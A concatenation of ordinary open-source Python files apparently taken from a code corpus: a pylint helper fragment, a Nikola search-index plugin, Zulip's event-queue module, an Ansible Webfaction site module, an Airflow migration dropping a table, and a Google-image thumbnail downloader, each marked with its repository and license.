for var_type in node.infer():
if var_type == astroid.YES or is_none(var_type):
continue
types.add(var_type)
if len(types) > 1:
return
except astroid.InferenceError:
return
return types.pop() if types else None
def is_registered_in_singledispatch_function(node):
"""Check if the given function node is a singledispatch function."""
singledispatch_qnames = (
'functools.singledispatch',
'singledispatch.singledispatch'
)
if not isinstance(node, astroid.FunctionDef):
return False
decorators = node.decorators.nodes if node.decorators else []
for decorator in decorators:
# func.register are function calls
if not isinstance(decorator, astroid.Call):
continue
func = decorator.func
if not isinstance(func, astroid.Attribute) or func.attrname != 'register':
continue
try:
func_def = next(func.expr.infer())
except astroid.InferenceError:
continue
if isinstance(func_def, astroid.FunctionDef):
return decorated_with(func_def, singledispatch_qnames)
return False
| mit |
getnikola/plugins | v7/localsearch/localsearch/__init__.py | 1 | 4350 | # -*- coding: utf-8 -*-
# Copyright Β© 2012-2014 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals
import codecs
import json
import os
from nikola.plugin_categories import LateTask
from nikola.utils import apply_filters, config_changed, copy_tree, makedirs
# This is what we need to produce:
# var tipuesearch = {"pages": [
# {"title": "Tipue Search, a jQuery site search engine", "text": "Tipue
# Search is a site search engine jQuery plugin. It's free for both commercial and
# non-commercial use and released under the MIT License. Tipue Search includes
# features such as word stemming and word replacement.", "tags": "JavaScript",
# "loc": "http://www.tipue.com/search"},
# {"title": "Tipue Search demo", "text": "Tipue Search demo. Tipue Search is
# a site search engine jQuery plugin.", "tags": "JavaScript", "loc":
# "http://www.tipue.com/search/demo"},
# {"title": "About Tipue", "text": "Tipue is a small web development/design
# studio based in North London. We've been around for over a decade.", "tags": "",
# "loc": "http://www.tipue.com/about"}
# ]};
class Tipue(LateTask):
"""Render the blog posts as JSON data."""
name = "localsearch"
def gen_tasks(self):
self.site.scan_posts()
kw = {
"translations": self.site.config['TRANSLATIONS'],
"output_folder": self.site.config['OUTPUT_FOLDER'],
"filters": self.site.config['FILTERS'],
"timeline": self.site.timeline,
}
posts = self.site.timeline[:]
dst_path = os.path.join(kw["output_folder"], "assets", "js",
"tipuesearch_content.js")
def save_data():
pages = []
for lang in kw["translations"]:
for post in posts:
# Don't index drafts (Issue #387)
if post.is_draft or post.is_private or post.publish_later:
continue
text = post.text(lang, strip_html=True)
text = text.replace('^', '')
data = {}
data["title"] = post.title(lang)
data["text"] = text
data["tags"] = ",".join(post.tags)
data["url"] = post.permalink(lang, absolute=True)
pages.append(data)
output = json.dumps({"pages": pages}, indent=2)
output = 'var tipuesearch = ' + output + ';'
makedirs(os.path.dirname(dst_path))
with codecs.open(dst_path, "wb+", "utf8") as fd:
fd.write(output)
task = {
"basename": str(self.name),
"name": dst_path,
"targets": [dst_path],
"actions": [(save_data, [])],
'uptodate': [config_changed(kw)],
'calc_dep': ['_scan_locs:sitemap']
}
yield apply_filters(task, kw['filters'])
# Copy all the assets to the right places
asset_folder = os.path.join(os.path.dirname(__file__), "files")
for task in copy_tree(asset_folder, kw["output_folder"]):
task["basename"] = str(self.name)
yield apply_filters(task, kw['filters'])
| mit |
udxxabp/zulip | zerver/lib/event_queue.py | 115 | 29293 | from __future__ import absolute_import
from django.conf import settings
from django.utils.timezone import now
from collections import deque
import datetime
import os
import time
import socket
import logging
import ujson
import requests
import cPickle as pickle
import atexit
import sys
import signal
import tornado
import random
import traceback
from zerver.lib.cache import cache_get_many, message_cache_key, \
user_profile_by_id_cache_key, cache_save_user_profile
from zerver.lib.cache_helpers import cache_with_key
from zerver.lib.utils import statsd
from zerver.middleware import async_request_restart
from zerver.models import get_client, Message
from zerver.lib.narrow import build_narrow_filter
from zerver.lib.queue import queue_json_publish
from zerver.lib.timestamp import timestamp_to_datetime
import copy
# The idle timeout used to be a week, but we found that in that
# situation, queues from dead browser sessions would grow quite large
# due to the accumulation of message data in those queues.
IDLE_EVENT_QUEUE_TIMEOUT_SECS = 60 * 10
EVENT_QUEUE_GC_FREQ_MSECS = 1000 * 60 * 5
# Capped limit for how long a client can request an event queue
# to live
MAX_QUEUE_TIMEOUT_SECS = 7 * 24 * 60 * 60
# The heartbeats effectively act as a server-side timeout for
# get_events(). The actual timeout value is randomized for each
# client connection based on the below value. We ensure that the
# maximum timeout value is 55 seconds, to deal with crappy home
# wireless routers that kill "inactive" http connections.
HEARTBEAT_MIN_FREQ_SECS = 45
class ClientDescriptor(object):
def __init__(self, user_profile_id, realm_id, event_queue, event_types, client_type,
apply_markdown=True, all_public_streams=False, lifespan_secs=0,
narrow=[]):
# These objects are serialized on shutdown and restored on restart.
# If fields are added or semantics are changed, temporary code must be
# added to load_event_queues() to update the restored objects.
# Additionally, the to_dict and from_dict methods must be updated
self.user_profile_id = user_profile_id
self.realm_id = realm_id
self.current_handler = None
self.event_queue = event_queue
self.queue_timeout = lifespan_secs
self.event_types = event_types
self.last_connection_time = time.time()
self.apply_markdown = apply_markdown
self.all_public_streams = all_public_streams
self.client_type = client_type
self._timeout_handle = None
self.narrow = narrow
self.narrow_filter = build_narrow_filter(narrow)
# Clamp queue_timeout to between minimum and maximum timeouts
self.queue_timeout = max(IDLE_EVENT_QUEUE_TIMEOUT_SECS, min(self.queue_timeout, MAX_QUEUE_TIMEOUT_SECS))
def to_dict(self):
# If you add a new key to this dict, make sure you add appropriate
# migration code in from_dict or load_event_queues to account for
# loading event queues that lack that key.
return dict(user_profile_id=self.user_profile_id,
realm_id=self.realm_id,
event_queue=self.event_queue.to_dict(),
queue_timeout=self.queue_timeout,
event_types=self.event_types,
last_connection_time=self.last_connection_time,
apply_markdown=self.apply_markdown,
all_public_streams=self.all_public_streams,
narrow=self.narrow,
client_type=self.client_type.name)
@classmethod
def from_dict(cls, d):
ret = cls(d['user_profile_id'], d['realm_id'],
EventQueue.from_dict(d['event_queue']), d['event_types'],
get_client(d['client_type']), d['apply_markdown'], d['all_public_streams'],
d['queue_timeout'], d.get('narrow', []))
ret.last_connection_time = d['last_connection_time']
return ret
def prepare_for_pickling(self):
self.current_handler = None
self._timeout_handle = None
def add_event(self, event):
if self.current_handler is not None:
async_request_restart(self.current_handler._request)
self.event_queue.push(event)
self.finish_current_handler()
def finish_current_handler(self):
if self.current_handler is not None:
err_msg = "Got error finishing handler for queue %s" % (self.event_queue.id,)
try:
# We call async_request_restart here in case we are
# being finished without any events (because another
# get_events request has supplanted this request)
async_request_restart(self.current_handler._request)
self.current_handler._request._log_data['extra'] = "[%s/1]" % (self.event_queue.id,)
self.current_handler.zulip_finish(dict(result='success', msg='',
events=self.event_queue.contents(),
queue_id=self.event_queue.id),
self.current_handler._request,
apply_markdown=self.apply_markdown)
except IOError as e:
if e.message != 'Stream is closed':
logging.exception(err_msg)
except AssertionError as e:
if e.message != 'Request closed':
logging.exception(err_msg)
except Exception:
logging.exception(err_msg)
finally:
self.disconnect_handler()
return True
return False
def accepts_event(self, event):
if self.event_types is not None and event["type"] not in self.event_types:
return False
if event["type"] == "message":
return self.narrow_filter(event)
return True
# TODO: Refactor so we don't need this function
def accepts_messages(self):
return self.event_types is None or "message" in self.event_types
def idle(self, now):
if not hasattr(self, 'queue_timeout'):
self.queue_timeout = IDLE_EVENT_QUEUE_TIMEOUT_SECS
return (self.current_handler is None
and now - self.last_connection_time >= self.queue_timeout)
def connect_handler(self, handler):
self.current_handler = handler
handler.client_descriptor = self
self.last_connection_time = time.time()
def timeout_callback():
self._timeout_handle = None
# All clients get heartbeat events
self.add_event(dict(type='heartbeat'))
ioloop = tornado.ioloop.IOLoop.instance()
heartbeat_time = time.time() + HEARTBEAT_MIN_FREQ_SECS + random.randint(0, 10)
if self.client_type.name != 'API: heartbeat test':
self._timeout_handle = ioloop.add_timeout(heartbeat_time, timeout_callback)
def disconnect_handler(self, client_closed=False):
if self.current_handler:
self.current_handler.client_descriptor = None
if client_closed:
request = self.current_handler._request
logging.info("Client disconnected for queue %s (%s via %s)" % \
(self.event_queue.id, request._email, request.client.name))
self.current_handler = None
if self._timeout_handle is not None:
ioloop = tornado.ioloop.IOLoop.instance()
ioloop.remove_timeout(self._timeout_handle)
self._timeout_handle = None
def cleanup(self):
do_gc_event_queues([self.event_queue.id], [self.user_profile_id],
[self.realm_id])
def compute_full_event_type(event):
if event["type"] == "update_message_flags":
if event["all"]:
# Put the "all" case in its own category
return "all_flags/%s/%s" % (event["flag"], event["operation"])
return "flags/%s/%s" % (event["operation"], event["flag"])
return event["type"]
class EventQueue(object):
def __init__(self, id):
self.queue = deque()
self.next_event_id = 0
self.id = id
self.virtual_events = {}
def to_dict(self):
# If you add a new key to this dict, make sure you add appropriate
# migration code in from_dict or load_event_queues to account for
# loading event queues that lack that key.
return dict(id=self.id,
next_event_id=self.next_event_id,
queue=list(self.queue),
virtual_events=self.virtual_events)
@classmethod
def from_dict(cls, d):
ret = cls(d['id'])
ret.next_event_id = d['next_event_id']
ret.queue = deque(d['queue'])
ret.virtual_events = d.get("virtual_events", {})
return ret
def push(self, event):
event['id'] = self.next_event_id
self.next_event_id += 1
full_event_type = compute_full_event_type(event)
if (full_event_type in ["pointer", "restart"] or
full_event_type.startswith("flags/")):
if full_event_type not in self.virtual_events:
self.virtual_events[full_event_type] = copy.deepcopy(event)
return
# Update the virtual event with the values from the event
virtual_event = self.virtual_events[full_event_type]
virtual_event["id"] = event["id"]
if "timestamp" in event:
virtual_event["timestamp"] = event["timestamp"]
if full_event_type == "pointer":
virtual_event["pointer"] = event["pointer"]
elif full_event_type == "restart":
virtual_event["server_generation"] = event["server_generation"]
elif full_event_type.startswith("flags/"):
virtual_event["messages"] += event["messages"]
else:
self.queue.append(event)
# Note that pop ignores virtual events. This is fine in our
# current usage since virtual events should always be resolved to
# a real event before being given to users.
def pop(self):
return self.queue.popleft()
def empty(self):
return len(self.queue) == 0 and len(self.virtual_events) == 0
# See the comment on pop; that applies here as well
def prune(self, through_id):
while len(self.queue) != 0 and self.queue[0]['id'] <= through_id:
self.pop()
def contents(self):
contents = []
virtual_id_map = {}
for event_type in self.virtual_events:
virtual_id_map[self.virtual_events[event_type]["id"]] = self.virtual_events[event_type]
virtual_ids = sorted(list(virtual_id_map.keys()))
# Merge the virtual events into their final place in the queue
index = 0
length = len(virtual_ids)
for event in self.queue:
while index < length and virtual_ids[index] < event["id"]:
contents.append(virtual_id_map[virtual_ids[index]])
index += 1
contents.append(event)
while index < length:
contents.append(virtual_id_map[virtual_ids[index]])
index += 1
self.virtual_events = {}
self.queue = deque(contents)
return contents
# maps queue ids to client descriptors
clients = {}
# maps user id to list of client descriptors
user_clients = {}
# maps realm id to list of client descriptors with all_public_streams=True
realm_clients_all_streams = {}
# list of registered gc hooks.
# each one will be called with a user profile id, queue, and bool
# last_for_client that is true if this is the last queue pertaining
# to this user_profile_id
# that is about to be deleted
gc_hooks = []
next_queue_id = 0
def add_client_gc_hook(hook):
gc_hooks.append(hook)
def get_client_descriptor(queue_id):
return clients.get(queue_id)
def get_client_descriptors_for_user(user_profile_id):
return user_clients.get(user_profile_id, [])
def get_client_descriptors_for_realm_all_streams(realm_id):
return realm_clients_all_streams.get(realm_id, [])
def add_to_client_dicts(client):
user_clients.setdefault(client.user_profile_id, []).append(client)
if client.all_public_streams or client.narrow != []:
realm_clients_all_streams.setdefault(client.realm_id, []).append(client)
def allocate_client_descriptor(user_profile_id, realm_id, event_types, client_type,
apply_markdown, all_public_streams, lifespan_secs,
narrow=[]):
global next_queue_id
id = str(settings.SERVER_GENERATION) + ':' + str(next_queue_id)
next_queue_id += 1
client = ClientDescriptor(user_profile_id, realm_id, EventQueue(id), event_types, client_type,
apply_markdown, all_public_streams, lifespan_secs, narrow)
clients[id] = client
add_to_client_dicts(client)
return client
def do_gc_event_queues(to_remove, affected_users, affected_realms):
def filter_client_dict(client_dict, key):
if key not in client_dict:
return
new_client_list = filter(lambda c: c.event_queue.id not in to_remove,
client_dict[key])
if len(new_client_list) == 0:
del client_dict[key]
else:
client_dict[key] = new_client_list
for user_id in affected_users:
filter_client_dict(user_clients, user_id)
for realm_id in affected_realms:
filter_client_dict(realm_clients_all_streams, realm_id)
for id in to_remove:
for cb in gc_hooks:
cb(clients[id].user_profile_id, clients[id], clients[id].user_profile_id not in user_clients)
del clients[id]
def gc_event_queues():
start = time.time()
to_remove = set()
affected_users = set()
affected_realms = set()
for (id, client) in clients.iteritems():
if client.idle(start):
to_remove.add(id)
affected_users.add(client.user_profile_id)
affected_realms.add(client.realm_id)
do_gc_event_queues(to_remove, affected_users, affected_realms)
logging.info(('Tornado removed %d idle event queues owned by %d users in %.3fs.'
+ ' Now %d active queues')
% (len(to_remove), len(affected_users), time.time() - start,
len(clients)))
statsd.gauge('tornado.active_queues', len(clients))
statsd.gauge('tornado.active_users', len(user_clients))
def dump_event_queues():
start = time.time()
with file(settings.JSON_PERSISTENT_QUEUE_FILENAME, "w") as stored_queues:
ujson.dump([(qid, client.to_dict()) for (qid, client) in clients.iteritems()],
stored_queues)
logging.info('Tornado dumped %d event queues in %.3fs'
% (len(clients), time.time() - start))
def load_event_queues():
global clients
start = time.time()
if os.path.exists(settings.PERSISTENT_QUEUE_FILENAME):
try:
with file(settings.PERSISTENT_QUEUE_FILENAME, "r") as stored_queues:
clients = pickle.load(stored_queues)
except (IOError, EOFError):
pass
else:
# ujson chokes on bad input pretty easily. We separate out the actual
# file reading from the loading so that we don't silently fail if we get
# bad input.
try:
with file(settings.JSON_PERSISTENT_QUEUE_FILENAME, "r") as stored_queues:
json_data = stored_queues.read()
try:
clients = dict((qid, ClientDescriptor.from_dict(client))
for (qid, client) in ujson.loads(json_data))
except Exception:
logging.exception("Could not deserialize event queues")
except (IOError, EOFError):
pass
for client in clients.itervalues():
# Put code for migrations due to event queue data format changes here
add_to_client_dicts(client)
logging.info('Tornado loaded %d event queues in %.3fs'
% (len(clients), time.time() - start))
def send_restart_events():
event = dict(type='restart', server_generation=settings.SERVER_GENERATION)
for client in clients.itervalues():
if client.accepts_event(event):
client.add_event(event.copy())
def setup_event_queue():
load_event_queues()
atexit.register(dump_event_queues)
# Make sure we dump event queues even if we exit via signal
signal.signal(signal.SIGTERM, lambda signum, stack: sys.exit(1))
try:
os.rename(settings.PERSISTENT_QUEUE_FILENAME, "/var/tmp/event_queues.pickle.last")
except OSError:
pass
try:
os.rename(settings.JSON_PERSISTENT_QUEUE_FILENAME, "/var/tmp/event_queues.json.last")
except OSError:
pass
# Set up event queue garbage collection
ioloop = tornado.ioloop.IOLoop.instance()
pc = tornado.ioloop.PeriodicCallback(gc_event_queues,
EVENT_QUEUE_GC_FREQ_MSECS, ioloop)
pc.start()
send_restart_events()
# The following functions are called from Django
# Workaround to support the Python-requests 1.0 transition of .json
# from a property to a function
requests_json_is_function = callable(requests.Response.json)
def extract_json_response(resp):
if requests_json_is_function:
return resp.json()
else:
return resp.json
def request_event_queue(user_profile, user_client, apply_markdown,
queue_lifespan_secs, event_types=None, all_public_streams=False,
narrow=[]):
if settings.TORNADO_SERVER:
req = {'dont_block' : 'true',
'apply_markdown': ujson.dumps(apply_markdown),
'all_public_streams': ujson.dumps(all_public_streams),
'client' : 'internal',
'user_client' : user_client.name,
'narrow' : ujson.dumps(narrow),
'lifespan_secs' : queue_lifespan_secs}
if event_types is not None:
req['event_types'] = ujson.dumps(event_types)
resp = requests.get(settings.TORNADO_SERVER + '/api/v1/events',
auth=requests.auth.HTTPBasicAuth(user_profile.email,
user_profile.api_key),
params=req)
resp.raise_for_status()
return extract_json_response(resp)['queue_id']
return None
def get_user_events(user_profile, queue_id, last_event_id):
if settings.TORNADO_SERVER:
resp = requests.get(settings.TORNADO_SERVER + '/api/v1/events',
auth=requests.auth.HTTPBasicAuth(user_profile.email,
user_profile.api_key),
params={'queue_id' : queue_id,
'last_event_id': last_event_id,
'dont_block' : 'true',
'client' : 'internal'})
resp.raise_for_status()
return extract_json_response(resp)['events']
# Send email notifications to idle users
# after they are idle for 1 hour
NOTIFY_AFTER_IDLE_HOURS = 1
def build_offline_notification(user_profile_id, message_id):
return {"user_profile_id": user_profile_id,
"message_id": message_id,
"timestamp": time.time()}
def missedmessage_hook(user_profile_id, queue, last_for_client):
# Only process missedmessage hook when the last queue for a
# client has been garbage collected
if not last_for_client:
return
message_ids_to_notify = []
for event in queue.event_queue.contents():
if not event['type'] == 'message' or not event['flags']:
continue
if 'mentioned' in event['flags'] and not 'read' in event['flags']:
notify_info = dict(message_id=event['message']['id'])
if not event.get('push_notified', False):
notify_info['send_push'] = True
if not event.get('email_notified', False):
notify_info['send_email'] = True
message_ids_to_notify.append(notify_info)
for notify_info in message_ids_to_notify:
msg_id = notify_info['message_id']
notice = build_offline_notification(user_profile_id, msg_id)
if notify_info.get('send_push', False):
queue_json_publish("missedmessage_mobile_notifications", notice, lambda notice: None)
if notify_info.get('send_email', False):
queue_json_publish("missedmessage_emails", notice, lambda notice: None)
@cache_with_key(message_cache_key, timeout=3600*24)
def get_message_by_id_dbwarn(message_id):
if not settings.TEST_SUITE:
logging.warning("Tornado failed to load message from memcached when delivering!")
return Message.objects.select_related().get(id=message_id)
def receiver_is_idle(user_profile_id, realm_presences):
# If a user has no message-receiving event queues, they've got no open zulip
# session so we notify them
all_client_descriptors = get_client_descriptors_for_user(user_profile_id)
message_event_queues = [client for client in all_client_descriptors if client.accepts_messages()]
off_zulip = len(message_event_queues) == 0
# It's possible a recipient is not in the realm of a sender. We don't have
# presence information in this case (and it's hard to get without an additional
# db query) so we simply don't try to guess if this cross-realm recipient
# has been idle for too long
if realm_presences is None or not user_profile_id in realm_presences:
return off_zulip
# We want to find the newest "active" presence entity and compare that to the
# activity expiry threshold.
user_presence = realm_presences[user_profile_id]
latest_active_timestamp = None
idle = False
for client, status in user_presence.iteritems():
if (latest_active_timestamp is None or status['timestamp'] > latest_active_timestamp) and \
status['status'] == 'active':
latest_active_timestamp = status['timestamp']
if latest_active_timestamp is None:
idle = True
else:
active_datetime = timestamp_to_datetime(latest_active_timestamp)
# 140 seconds is consistent with activity.js:OFFLINE_THRESHOLD_SECS
idle = now() - active_datetime > datetime.timedelta(seconds=140)
return off_zulip or idle
def process_message_event(event_template, users):
realm_presences = {int(k): v for k, v in event_template['presences'].items()}
sender_queue_id = event_template.get('sender_queue_id', None)
if "message_dict_markdown" in event_template:
message_dict_markdown = event_template['message_dict_markdown']
message_dict_no_markdown = event_template['message_dict_no_markdown']
else:
# We can delete this and get_message_by_id_dbwarn after the
# next prod deploy
message = get_message_by_id_dbwarn(event_template['message'])
message_dict_markdown = message.to_dict(True)
message_dict_no_markdown = message.to_dict(False)
sender_id = message_dict_markdown['sender_id']
message_id = message_dict_markdown['id']
message_type = message_dict_markdown['type']
sending_client = message_dict_markdown['client']
# To remove duplicate clients: Maps queue ID to {'client': Client, 'flags': flags}
send_to_clients = dict()
# Extra user-specific data to include
extra_user_data = {}
if 'stream_name' in event_template and not event_template.get("invite_only"):
for client in get_client_descriptors_for_realm_all_streams(event_template['realm_id']):
send_to_clients[client.event_queue.id] = {'client': client, 'flags': None}
if sender_queue_id is not None and client.event_queue.id == sender_queue_id:
send_to_clients[client.event_queue.id]['is_sender'] = True
for user_data in users:
user_profile_id = user_data['id']
flags = user_data.get('flags', [])
for client in get_client_descriptors_for_user(user_profile_id):
send_to_clients[client.event_queue.id] = {'client': client, 'flags': flags}
if sender_queue_id is not None and client.event_queue.id == sender_queue_id:
send_to_clients[client.event_queue.id]['is_sender'] = True
# If the recipient was offline and the message was a single or group PM to him
# or she was @-notified potentially notify more immediately
received_pm = message_type == "private" and user_profile_id != sender_id
mentioned = 'mentioned' in flags
idle = receiver_is_idle(user_profile_id, realm_presences)
always_push_notify = user_data.get('always_push_notify', False)
if (received_pm or mentioned) and (idle or always_push_notify):
notice = build_offline_notification(user_profile_id, message_id)
queue_json_publish("missedmessage_mobile_notifications", notice, lambda notice: None)
notified = dict(push_notified=True)
# Don't send missed message emails if always_push_notify is True
if idle:
# We require RabbitMQ to do this, as we can't call the email handler
# from the Tornado process. So if there's no rabbitmq support do nothing
queue_json_publish("missedmessage_emails", notice, lambda notice: None)
notified['email_notified'] = True
extra_user_data[user_profile_id] = notified
for client_data in send_to_clients.itervalues():
client = client_data['client']
flags = client_data['flags']
is_sender = client_data.get('is_sender', False)
extra_data = extra_user_data.get(client.user_profile_id, None)
if not client.accepts_messages():
# The actual check is the accepts_event() check below;
# this line is just an optimization to avoid copying
# message data unnecessarily
continue
if client.apply_markdown:
message_dict = message_dict_markdown
else:
message_dict = message_dict_no_markdown
# Make sure Zephyr mirroring bots know whether stream is invite-only
if "mirror" in client.client_type.name and event_template.get("invite_only"):
message_dict = message_dict.copy()
message_dict["invite_only_stream"] = True
user_event = dict(type='message', message=message_dict, flags=flags)
if extra_data is not None:
user_event.update(extra_data)
if is_sender:
local_message_id = event_template.get('local_id', None)
if local_message_id is not None:
user_event["local_message_id"] = local_message_id
if not client.accepts_event(user_event):
continue
# The below prevents (Zephyr) mirroring loops.
if ('mirror' in sending_client and
sending_client.lower() == client.client_type.name.lower()):
continue
client.add_event(user_event)
def process_event(event, users):
for user_profile_id in users:
for client in get_client_descriptors_for_user(user_profile_id):
if client.accepts_event(event):
client.add_event(event.copy())
def process_userdata_event(event_template, users):
for user_data in users:
user_profile_id = user_data['id']
user_event = event_template.copy() # shallow, but deep enough for our needs
for key in user_data.keys():
if key != "id":
user_event[key] = user_data[key]
for client in get_client_descriptors_for_user(user_profile_id):
if client.accepts_event(user_event):
client.add_event(user_event)
def process_notification(notice):
event = notice['event']
users = notice['users']
if event['type'] in ["update_message"]:
process_userdata_event(event, users)
elif event['type'] == "message":
process_message_event(event, users)
else:
process_event(event, users)
# Runs in the Django process to send a notification to Tornado.
#
# We use JSON rather than bare form parameters, so that we can represent
# different types and for compatibility with non-HTTP transports.
def send_notification_http(data):
if settings.TORNADO_SERVER and not settings.RUNNING_INSIDE_TORNADO:
requests.post(settings.TORNADO_SERVER + '/notify_tornado', data=dict(
data = ujson.dumps(data),
secret = settings.SHARED_SECRET))
else:
process_notification(data)
def send_notification(data):
return queue_json_publish("notify_tornado", data, send_notification_http)
def send_event(event, users):
return queue_json_publish("notify_tornado",
dict(event=event, users=users),
send_notification_http)
| apache-2.0 |
frenchfrywpepper/ansible-modules-extras | cloud/webfaction/webfaction_site.py | 62 | 6939 | #!/usr/bin/python
#
# Create Webfaction website using Ansible and the Webfaction API
#
# ------------------------------------------
#
# (c) Quentin Stafford-Fraser 2015
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: webfaction_site
short_description: Add or remove a website on a Webfaction host
description:
- Add or remove a website on a Webfaction host. Further documentation at http://github.com/quentinsf/ansible-webfaction.
author: Quentin Stafford-Fraser (@quentinsf)
version_added: "2.0"
notes:
- Sadly, you I(do) need to know your webfaction hostname for the C(host) parameter. But at least, unlike the API, you don't need to know the IP address - you can use a DNS name.
- If a site of the same name exists in the account but on a different host, the operation will exit.
- "You can run playbooks that use this on a local machine, or on a Webfaction host, or elsewhere, since the scripts use the remote webfaction API - the location is not important. However, running them on multiple hosts I(simultaneously) is best avoided. If you don't specify I(localhost) as your host, you may want to add C(serial: 1) to the plays."
- See `the webfaction API <http://docs.webfaction.com/xmlrpc-api/>`_ for more info.
options:
name:
description:
- The name of the website
required: true
state:
description:
- Whether the website should exist
required: false
choices: ['present', 'absent']
default: "present"
host:
description:
- The webfaction host on which the site should be created.
required: true
https:
description:
- Whether or not to use HTTPS
required: false
choices:
- true
- false
default: 'false'
site_apps:
description:
- A mapping of URLs to apps
required: false
subdomains:
description:
- A list of subdomains associated with this site.
required: false
default: null
login_name:
description:
- The webfaction account to use
required: true
login_password:
description:
- The webfaction password to use
required: true
'''
EXAMPLES = '''
- name: create website
webfaction_site:
name: testsite1
state: present
host: myhost.webfaction.com
subdomains:
- 'testsite1.my_domain.org'
site_apps:
- ['testapp1', '/']
https: no
login_name: "{{webfaction_user}}"
login_password: "{{webfaction_passwd}}"
'''
import socket
import xmlrpclib
webfaction = xmlrpclib.ServerProxy('https://api.webfaction.com/')
def main():
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True),
state = dict(required=False, choices=['present', 'absent'], default='present'),
# You can specify an IP address or hostname.
host = dict(required=True),
https = dict(required=False, type='bool', default=False),
subdomains = dict(required=False, type='list', default=[]),
site_apps = dict(required=False, type='list', default=[]),
login_name = dict(required=True),
login_password = dict(required=True),
),
supports_check_mode=True
)
site_name = module.params['name']
site_state = module.params['state']
site_host = module.params['host']
site_ip = socket.gethostbyname(site_host)
session_id, account = webfaction.login(
module.params['login_name'],
module.params['login_password']
)
site_list = webfaction.list_websites(session_id)
site_map = dict([(i['name'], i) for i in site_list])
existing_site = site_map.get(site_name)
result = {}
# Here's where the real stuff happens
if site_state == 'present':
# Does a site with this name already exist?
if existing_site:
# If yes, but it's on a different IP address, then fail.
# If we wanted to allow relocation, we could add a 'relocate=true' option
# which would get the existing IP address, delete the site there, and create it
# at the new address. A bit dangerous, perhaps, so for now we'll require manual
# deletion if it's on another host.
if existing_site['ip'] != site_ip:
module.fail_json(msg="Website already exists with a different IP address. Please fix by hand.")
# If it's on this host and the key parameters are the same, nothing needs to be done.
if (existing_site['https'] == module.boolean(module.params['https'])) and \
(set(existing_site['subdomains']) == set(module.params['subdomains'])) and \
(dict(existing_site['website_apps']) == dict(module.params['site_apps'])):
module.exit_json(
changed = False
)
positional_args = [
session_id, site_name, site_ip,
module.boolean(module.params['https']),
module.params['subdomains'],
]
for a in module.params['site_apps']:
positional_args.append( (a[0], a[1]) )
if not module.check_mode:
# If this isn't a dry run, create or modify the site
result.update(
webfaction.create_website(
*positional_args
) if not existing_site else webfaction.update_website (
*positional_args
)
)
elif site_state == 'absent':
# If the site's already not there, nothing changed.
if not existing_site:
module.exit_json(
changed = False,
)
if not module.check_mode:
# If this isn't a dry run, delete the site
result.update(
webfaction.delete_website(session_id, site_name, site_ip)
)
else:
module.fail_json(msg="Unknown state specified: {}".format(site_state))
module.exit_json(
changed = True,
result = result
)
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
jgao54/airflow | airflow/migrations/versions/a56c9515abdc_remove_dag_stat_table.py | 6 | 1581 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Remove dag_stat table
Revision ID: a56c9515abdc
Revises: c8ffec048a3b
Create Date: 2018-12-27 10:27:59.715872
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'a56c9515abdc'
down_revision = 'c8ffec048a3b'
branch_labels = None
depends_on = None
def upgrade():
op.drop_table("dag_stats")
def downgrade():
op.create_table('dag_stats',
sa.Column('dag_id', sa.String(length=250), nullable=False),
sa.Column('state', sa.String(length=50), nullable=False),
sa.Column('count', sa.Integer(), nullable=False, default=0),
sa.Column('dirty', sa.Boolean(), nullable=False, default=False),
sa.PrimaryKeyConstraint('dag_id', 'state'))
| apache-2.0 |
shintoo/DailyImage | getimage.py | 1 | 1515 | #!/usr/bin/python
# getimage.py - this file is part of dailyimage
# Retrieve an image from a google image search
import sys # argv
import re # finding images
import requests # downloading results and images
import bs4 # finding images
def get_image(query):
'''
function get_image
generator
arguments:
query: string
yields:
Raw image data retrieved from a google image search of the query
'''
# URL for the image search
url = 'https://www.google.com/search?tbm=isch&q=' + query
# Download the result
res = requests.get(url)
# Check for error code
res.raise_for_status()
# Generate the parser
Soup = bs4.BeautifulSoup(res.text, 'lxml')
# Find each image - in this case, the thumbnail of each result
images = Soup.findAll('img')
for img in images:
# Find all images with 'gstatic.com' in their src
search = re.search('gstatic.com', img['src'])
if search:
# Download the image
raw_image = requests.get(img['src'])
raw_image.raise_for_status()
# yield the raw binary data
yield raw_image.content
def main(argv):
if len(argv) != 2:
print('usage: getimage.py query')
get_image(argv[1]) # begin generator
print('Saving ' + argv[1] + '_image...')
fp = open(argv[1] + '_image', 'wb')
fp.write(next(get_image(argv[1])))
